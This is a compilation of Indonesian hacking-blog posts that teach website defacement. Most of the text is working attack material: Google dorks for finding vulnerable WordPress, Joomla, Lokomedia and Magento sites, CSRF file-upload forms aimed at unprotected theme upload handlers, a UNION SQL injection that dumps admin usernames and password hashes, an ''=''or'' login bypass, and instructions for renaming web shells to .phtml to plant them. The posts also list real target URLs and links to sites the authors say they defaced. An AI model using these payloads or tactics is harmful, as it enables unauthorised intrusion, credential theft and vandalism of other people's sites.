Maxteroit: Deface
Hallo fanss :* Berandal disini :)
Kali ini gw mau share Tutorial Deface Wordpress Themes ThisWay . Sebenernya ini Bug lama, tapi gada salahnya share :v Sapa tau masih Crotz :P


Bahan:
1. Xampp (DOWNLOAD)
2. Exploter (PHP) - [SEDOT]
2. CSRF (Buat yg males pake xampp :v) [SEDOT]
3. Shell atau Script Deface (Kalo belom punya, bisa ambil disini.)


Langkah:
1. Dorking di google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln:
{"status":"NOK", "ERR":"This file is incorect"}

5. Masukin ke CSRF

6. Kalo sukses bakal kluar nama file lu :)

7. Akses file?
site.co.li/wp-content/uploads/2017/02/namafile
contoh:
http://larryfarfan.com/wp-content/uploads/2017/02/settingsimage_h5aQ4ZfXcBYM6gSM.txt

Masih kurang jelas?
Simak video gw dibawah :)



Okee, cukup buat tutorial kali ini, Semoga Bermanfaat :)
.
Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes ThisWay

Dork com_user dan live target



Jumpa Lagi dengan saya Admin Tamvan :v oke kali ini saya akan share Dork Com_User Terbaru pasti udah pada Penasaran Ya :v hahaha oke silahkan di coba Gan
Baca Juga :


Dork-ing Dengan BinGoo Scanner
Hack Windows Atau Android

Dork :
 
inurl:component/content/?view=featured&format=feed&type=atom
inurl:index.php/using-joomla/extensions/modules/ intext:joomla! 1.7 site:info
inurl:index.php/using-joomla/extensions/modules/19-sample-data-articles/joomla/50-upgraders
inurl:using-joomla/extensions/templates/beez5/home-page-beez5
inurl:index.php?format=feed&type=rss
inurl:index.php/using-joomla/extensions/plugins?format=feed&type=rss
inurl:index.php?format=feed&type=atom
intext:+00:00 Joomla! 1.7 - Open Source
intext:+00:00 Joomla! 1.6 - Open Source
 
Live Target :

http://marketingprofit.pl/administrator
http://aivn.nl/administrator
http://www.oswiadczenia.eu/administrator
http://www.staverton.co.uk/administrator
http://sirirangaviaggi.com/administrator
http://geldres-harispe.com/administrator
http://lineup09.ch/administrator
http://missiodeihouston.org/administrator

Oke Segitu dulu gan . Dork Bisa di Kembangin Lagi :) salam Lamers

Sumber:Java Intelgent Cyber

Google Dork Com_User n Live Target ^_^



 Ok Saya Writter Baru Disini ^_^
Sebut Aja Saya Rizky21ID (https://web.facebook.com/MR.H3LL.NET)

Saya akan share Metode Deface CMS Joomla Com User apa ada yg tau apa itu Com User ? Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia. Com_User / Teknik Exploit joomla! ini dapat di gunakan untuk CMS Joomla! yang menggunakan joomla! versi 1.6.x. / 1.7.x. / 2.5.x.

Oke setelah Agan Udah tau apa itu Com_User Kita Langsung Ke TKP Nya Gan simak ya .

Yang anda butuhkan:
1. Exploit Joomla (download disini)

Langkah-Langkah:

1. Cari web target dengan menggunakan mesin pencari dengan "dork" yang ada dibawah ini.
Klik untuk membuka: Google Dork Com_User n Live Target

2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak

3. Cari web yang vuln.
*Penjelasan: Vuln = Vulnerability = Mempunyai kelemahan. Sehingga web yang dikatakan vuln berarti bisa untuk kita Deface.



Gambar diatas merupakan site "Vuln" alias menggunakan CMS Joomla Versi 1.7.X

Gambar diatas merupakan site "Joomla versi 1.6.x / 2.5.x".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.
4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.
index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration
5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.
6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.
7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 
8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 
contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.
*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.
13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)
*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/joomla/administrator

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Bagai mana Cara Tebas Index atau upload Shell Back Door ? Oke Itu akan Kita Bahas Next Time Gan :) 
Sumber : Java Intelegent Cyber
Kalo Ada Yang Bingung Contact Me:
https://web.facebook.com/Rizky21ID

Cara Deface CMS Joomla Dengan Com_User




Pagi fans :* Please say hello haters :P
Kali ini gw mau ksaih Tutorial Deface Wordpress Themes Sportimo.  Tutorial ini gak beda jauh sama tutorial sebelumnya :D

Baca: Tutorial Deface Wordpress Themes Radial.

Oke, sebelumnya kita siapin dulu bahan2 nya :D 

Bahan:  
 1. Dork
inurl:/wp-content/themes/sportimo 
2. Exploit
/wp-content/themes/sportimo-theme/functions/upload-handler.php
contoh
site.com/wp-content/themes/sportimo-theme/functions/upload-handler.php

3. Shell Backdoor atau Script Deface
Belum punya? Nih, Script Deface sederhana gw, COMOT

4. CSRF
CSRF copy disini. Simpan dalam format .html

Langkah - Langkah:
1. Dorking ke google.

2. Pilih salah satu site.

3. Masukkan exploitnya.

4. Kalo vuln bakal ada tulisan 'error'. Contoh:

  
5. Copy link yg vuln, paste di CSRF.

6. Buka CSRF, pilih file yg mau diupload, klik SIKAT!
NB: Kalo mau upload shell, rename dulu jadi .phtml contoh: shell.phtml

7. Kalo file sukses ke upload, bakal keluar nama file lu.

8.  Sekarang tinggal panggil file lu. Caranya?
/wp-content/uploads/tahun/bulan/namafile
contoh
http://kregle.net/wp-content/uploads/2017/01/o.phtml 

Kalo masih bingung, bisa liat video tutorial gw di bawah :)



 Ini hasil mirror an gw :
https://www.defacer.id/244106.html
https://1337mirror.com/12447.html

 Oke, sekian tutorial gw kali ini, see u next post :*

Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes Sportimo

Siang fanss :) Siang juga haters :P Ketemu lagi sama gw, admin yg paling tamvan :P :P
Okee, kali ini gw mau share Tutorial Deface Wordpress Themes Radial. Master - master lewat aja ya, ini buat Newbie kek gw :)



Bahan :

1. Dork
inurl:/wp-content/themes/radial-themes
Kembanging biar dapet yg Vuln + Perawan :p

2. CSRF
<form enctype="multipart/form-data"action="site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

3. Exploit
/wp-content/themes/radial-theme/functions/upload-handler.php
4. Shell atau Script Deface
       Belum punya? Nih, Script Deface sederhana gw, COMOT

Langkah - Langkah :
1. Dorking ke Google .

2. Pilih sala satu site.

3. Masukin exploit   
/wp-content/themes/radial-theme/functions/upload-handler.php 
Contoh:
 http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php

4. Kalo vuln bakal ada tulisan 'error'

5. Masukin site ke CSRF.
    Contoh:
<form enctype="multipart/form-data"action="http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

6. Upload file lu. Kalo mau upload shell, rename dulu jadi .phtml (contoh: shell.phtml)

7. Kalo sukses, akan keluar nama file lu.

8. File akses?
site.com/wp-content/uploads/tahun/bulan/namafile
Contoh:
http://www.jhttcars.be/wp-content/uploads/2017/01/berandal.txt

Kalo masih belom paham, liat video di bawah :)

 

Sekian tutorial gw kali ini, kalo ada pertanyaan, kontak gw aja dibawah :)

Regards, 
Berandal, [OWL SQUAD]

Deface Wordpress Themes Radial




Malem fanss :* Malem juga haters :p. Berandal update lagi nih :* Kali ini gw mau share Tutorial Cara Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Web Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak.

Oke, simak langsung aja ya tutorial deface web cms lokomedia :) .

Bahan : 

1. Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Baca juga: Install Websploit Termux

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

Baca jugaTutorial Deface WP Themes Qualifire.

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D (terdelete)


Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)

Sumber: Garuda Security Hacker dan TKJ Cyber Art

Regards,
Berandal. [OWL SQUAD]

Deface SQL Lokomedia







Yoo, fans :* Berandal here :D
Kali ini gw mau share Tutorial Deface WordPress Themes Qualifire :D
Caranya?? Simak di bawah :*

Alat dan Bahan :
1. Shell
2. Script Deface
3. CSRF
4. Koneksi Internet :v
5. Kopi + Rokok :p


Okee, simak aja tutorialnya :D

 1. Dorking ke google.

     Dork : inurl:/wp-content/themes/qualifire

     Kembangin dork biar dapet yg perawan :p


2. Pilih salah satu target.

3. Masukkan exploit

    Exploit: /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

    Vuln? Blank

4. Copy script CSRF di bawah ini, lalu paste di Notepad. Simpan dengan sxtensi .html (contoh:csrf.html).
    <form action="target" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="Filedata" ><br>
    <input type="submit" name="submit" value="Submit">
    </form>

5. Jangan lupa ganti "target" dengan url korban kalian :)

6. Buka CSRF.

7.  Upload file yg ingin kalian upload. Bisa shell atau script deface.

Akses file?
http://site.co.li/namafile (contoh: http://target.com/berandal.php)

Ini ada video DEMO dari gw, tapi di video ini gw cuman upload gambar :)


Okee, selesai :D
Sekian dulu tutorial gw kali ini, See u gaess :*

Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes Qualifire

Hai fans balik lagi sama Berandal, kali ini saya akan share di tahun 2019 sesuai judulnya yaitu tutorial cara Deface dengan Bypass Admin. Tutorial ini buat sesama noob seperi saya yang baru belajar deface, jadi buat yang udah mastah harap minggir dulu ya biarkan kami noob yang belajar tutorial deface bypass admin.

Ini termasuk kedalam SQL Injection, SQL Injection merupakan salah teknik eksploitasi web yang cukup lama, namun hingga saat ini teknik tersebut masih cukup mumpuni dan efektif untuk dilakukan. Buktinya saat ini masih ada saja (dan banyak) website yang mengidap penyakit vuln terhadap serangan SQL Injection.
Inti dari penyebab bug ini yaitu terletak pada si pembuat web (web programmer), anggap saja
ada kesalahan logika berpikir atau ketidaktahuaannya dalam membuat website yang aman. 🙂
Saya tekankan sekali lagi, masalah bug ini terletak pada diri programmer web.

Jadi, sehandal apapun sistem operasi atau web server yang digunakan akan menjadi percuma manakala si programmer memiliki kekeliruan logika ketika membangun sebuah web, khususnya SQL Injection.

Buat yang pengen tau lebih jelas kenapa ini bisa terjadi dimana letak kesalahan tersebut kunjungi aja nih.  "https://md15-ev.com/mengapa-bisa-terjadi-bypass-admin/"

Langsung aja yu pokok pembahasan deface dengan bypas admin, simak baik baik ya.



Bahan :
1. Dork (Ada di bawah ).
2. Shell Extensi .php.pjpeg atau php.xxxjpg
3. Kopi Item + Rokok.
4. Kesabaran :)


Dork Bypass Admin:
    inurl:/admin.php intext:login intext:adminsitrator
    inurl:/admin/index.php intext:username
    inurl :/admin/Admin.php intext:login
    inurl:/administrator/login.php intext:username site:.
    inurl:/login.php intext:administrator intext:login


Bahan sudah disiapkan lanjut ke caranya:

1. Dorking ke google.  Misal gw pake dork:
 inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.

3. Isi username + pass dengan
'=''or'

4.  Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.
     Jika login gagal, cari web yang lain. ( Ini guna kesabaran ) :v

5. Dan jika berhasil login, terserah kalian mau diapain :) .
    Bisa add/edit News atau mungkin kalo hoki nya bagus bisa upload shell :)

6. Kalo ada yg kurang jelas, simak video dibawah :)
    NB: Video Tutor di bawah ini, gw buat jauh sebelum artikel ini di publish :)


Ini hasil bypass admin gw yg udah gw tanem shell di dalemnya :)
https://www.defacer.id/228398.html
http://zone-h.org/mirror/id/27486827
http://www.livitanutric.com

 Okee, cukup, sekian tutorial gw kali ini, see u next post gaess :*

Buat yang pengen ebook / pdf POC bypass admin bisa download disini
password: techworldhack.blogspot.com
 Jan lupa like Fans Page OWL SQUAD di bawah ini ya :)

Regards,
Berandal, [OWL SQUAD]

Deface dengan Bypass Admin





Yoo, fanss :* Ketemu lagi di artikel gw yg sederhana tapi gak bermanfaat :D
Kali ini, gw mau bagi/share/kasih tau/apalah namanya, Cara Deface Via DNS Afraid.

Gimana sih cara parkir di DNS Afraid?

Oke, ini dia! Simak tutorial dibawah :*

Bahan - bahan :
1. Hosting Nazuka.net
2. Akun Afraid, [DAFTAR]
3. Script Defacce. Belom punya? Nih, gw ada , cek disini.

Langkah - langkah :

1. Masuk ke Nazuka.net


2. Lihat 'Account Information' di sebelah kanan, lalu copy+paste 'Server IP' kalian di notepad.






3. Buka File Manager


4. Ganti index.php dengan Script Deface kalian.


5.  Pergi ke 'Parked Domain'.


6. Jika sudah, tampilannya akan seperti ini.


7. Pergi ke Afraid, lalu pilih Subdomains.


8. Domainnya, pilih yang 'Many Many More Available'.


9. Nanti akan ada tulisan seperti ini, JANGAN diCLOSE! Klik 'Shared Domain Registry'. Lihat foto dibawah.


10. Akan ada banyak Domain yg bisa lu pakai, pilih salah satu.


11. Isi persis kya di bawah ini.


12.. Jika sudah, tampilannya akan seperti di bawah ini. Copy subdomain kalian, paste di Nazuka.net


13. Klik 'Park Domain'.


14. Jika berhasil, tampilannya akan seperti ini.


15. Cek subdomain kalian di tab baru, lihat hasilnya.


Berhasil? Jika berhasil, script kalian lah yang muncul :D

Okee, we're done fanss :*
Sekian postingan gw kali ini, see u next post :*

Regards,
Berandal, [OWL SQUAD]

Cara Deface Via DNS Afraid

Malem gaess :*
Jumpa lagi ama gw :v Gausah masang wajah kangen gitu ah :p

Hoho, kali ini gw mau share Script Deface baru gw :D Lumayan simple sih, tapi tetep KEREN kok :p


BACA : Deface dengan Magento Priv8


Langsung aja yak, gausah banya bacot :p



Yoo, fanss, berhubung dah malem + gw udah ngantuk, sekian aja yak artikel kali ini :*
See u next post :*

Regards, 
Berandal, [OWL SQUAD]

Script Deface 2 | Berandal [OWL SQUAD]

Script Deface Keren Sederhana

 


Holla sobat maxter, Gimana kabarnya, gimana hasil deface-defacenya, udah banyak ? atau udah bosen sama script defacenya?, jika bosen, nih ane mau share Script Deface Artefvcker Keren Sederhana V2.

Sebenernya script ini hasil nyolong sih, hasil nyolong dari web yg shell nya berhasil ane buka :v, yaudah deh gw comot scriptnya :v. Langsung saja bila sudah penasaran, simak baik2.

Ane gk akan kasih tau cara ganti url imagenya, ganti kata-nya dan lain-lain, karena udah harus bisa lah, masa defacer gk bisa merubah script :v, kan malu :v.

Berikut Demo nya, bisa dibuka, ini sampel langsung hasil deface-an ane yah, jgn bilang2 kalo artefvcker itu nick ane, entar gw jadi buronan :v

Nih web yg udah ane deface ===> DISINI


Jika udah gk kuat pengen nyoba itu script, nih link download-nya


nih ss nya :



Ouh iya, jika ingin join dengan team ane, silahkan tinggal ajukan permohonan ke grup facebook grup ini yaitu Owl Squad ====> Owl Squad

Biasakan tinggalkan jejak di kolom komentar atau Izin :v , jika ada yg ingin ditanyakan, silahkan tanyakan di kolom komentar,
Jika ingin request postingan atau tutorial, bisa klik laman Contact Us

Terima Kasih :), salam Defacer, Artefvcker

Script Deface Keren Artefvcker Sederhana V2





Malem, fanss :* Ketemu lagi sama gw :v kangen gak? :p
Hoho, kali ini gw mau share tentang Tutorial Deface dengan Magento Priv8. Tutor kali ini gw share setelah gw baca2 artikel di grup SurGoBLog . Dah yok, gausah banyak bacot :v Simak tutor nya gaess :*

Bahan - Bahan :
1. Dork (ada dibawah)
2. SQLi Dork Scanner (download)
3. Exploiter (download)
4. Kopi + Rokok :p
5. Ketabahan :v

Langsung simak cok :

Dork :


"/skin/

frontend/"
"/frontend/enterprise/"
"/js/mage/"
"/default/sales/"
"/customer/account/"
"/account/create/"
"/account/login/"
"/account/forgotpassword"
"/adminhtml/default/default/"
"lib/LinLibertineFont/"
"lib/3Dsecure/"
"lib/flex/"
"lib/googlecheckout/"
"lib/LinLibertineFont/"
"/catalogsearch/advanced"
"/sales/guest/form/"
"/catalogsearch/term/popular/"
"/catalog/seo_sitemap/category/"
"/index.php/catalog/seo_sitemap/category/"
"/index.php/catalogsearch/term/popular/"
"/catalogsearch/result/"
"/catalogsearch/result?q="
"/customer/account/login/referer/"
"skin/frontend/base/"
"skin/frontend/default/"
"skin/frontend/default/blank/"
"skin/frontend/default/blue/"
"skin/frontend/default/default/"
"skin/frontend/default/french/"
"skin/frontend/default/german/"
"skin/frontend/default/iphone/"
"skin/frontend/default/modern/"
"/skin/adminhtml/default/"
"inurl:/adminhtml/default/default/"
"inurl:/catalogsearch/result/"
"inurl:/catalogsearch/advanced"
"inurl:/catalogsearch/result?q="
"inurl:/sales/guest/form/"
"inurl:/default/sales/"
"inurl:/customer/account/login/referer/"
"inurl:/customer/account/"
"inurl:/account/create/"
"inurl:/account/login/"
"inurl:/account/create/"
"inurl:/account/forgotpassword"
"inurl:lib/LinLibertineFont/"
"inurl:lib/3Dsecure/"
"inurl:lib/flex/"
"/firecheckout/"
"inurl:lib/googlecheckout/"
"inurl:lib/LinLibertineFont/"
"inurl:skin/frontend/base/"
"inurl:skin/frontend/default/blank/"
"inurl:skin/frontend/default/blue/"
"inurl:skin/frontend/default/default/"
"inurl:skin/frontend/default/french/"
"inurl:skin/frontend/default/german/"
"inurl:skin/frontend/default/iphone/"
"inurl:skin/frontend/default/modern/"
"index.php/sales/guest/"
"index.php/catalogsearch/result/"
"index.php/catalogsearch/advanced"
"index.php/catalogsearch/result?q="
"index.php/sales/guest/form/"
"index.php/default/sales/"
"index.php/customer/account/login/referer/"
"index.php/customer/account/"
"index.php/account/create/"
"index.php/account/login/"
"index.php/account/create/"
"index.php/account/forgotpassword"
"index.php/adminhtml/default/default/"
1.  Buka SQLi Dork Scanner



2. Klik Remove Clones,
3. Copy All web , lalu paste di Exploiter, jangan lupa mengisi username dan password.



3. Klik scan.
4. Lihat 'Succes'




5. Buka admin page nya
    site.c0.li/admin
    site.c0.li/index.php/admin

 6. Login dengan username dan password yg kalian isi di exploiter tadi.




7.  Select 'System' klik 'Configuration'



8. Klik 'Design' di sidebar kiri



9.  Setelah masuk ke 'Design' pilih 'HTML Head'



10.  Isi 'Miscellaneous Scripts' dengan Script Deface kalian.. Belum punya? Klik disini



11. Klik 'Save Config'



12. Jika berhasil, tampilanya akan seperti ini:




13.  Well done gaess :* Cek website lu.




Udah kan?
Okee, sekian tutorial gw kali ini. Jika ada pertanyaan, ada kontak gw dibawah :D
See u next post gaess :*

Special thanks to :
SurGoBLog
Tools Maker
[OWL SQUAD] 


Regards,
Berandal, [OWL SQUAD]

Deface dengan Magento Priv8

Lagi - lagi ketemu gw :*
Yap, kali ini gw bikin postingan sesuai request dari pembaca yang dikirim lewat Page Contact Us.
Cara Menutup Bug Hosting Nazuka 
Kemaren gw dapet beberapa pertanyaan kayak gini :

"Gimana sih caranya biar web yg saya deface gak di-redeface?"
"Gimana cara nutup bug nya bang?"


Yap, simak tutorial dibawah :*


BACA: Cara Deface Metode elFinder Web Host Bug



1. Buka shell yg udah ketanem di web korban.

Ini web yang udah w deface

\
ini penampakan shellnya




2. Buka _file-manager .



3. Buka php.



4. Edit connector.php . Terserah, bisa dengan tulisan biasa / script deface kalian. :D Butuh script deface? Disini




5. Jika sudah, klik 'Save', lalu lihat hasilnya http://site.c0.li/_file-manager/php/connector.php .




Selesai! Gampang kan? :*
Okee, sekian tutorial tentang Cara Menutup Bug Hosting Nazuka
 Thank for reading, aaand, see u next post :*

Regards,

Cara Menutup Bug Hosting Nazuka

Subscribe Our Newsletter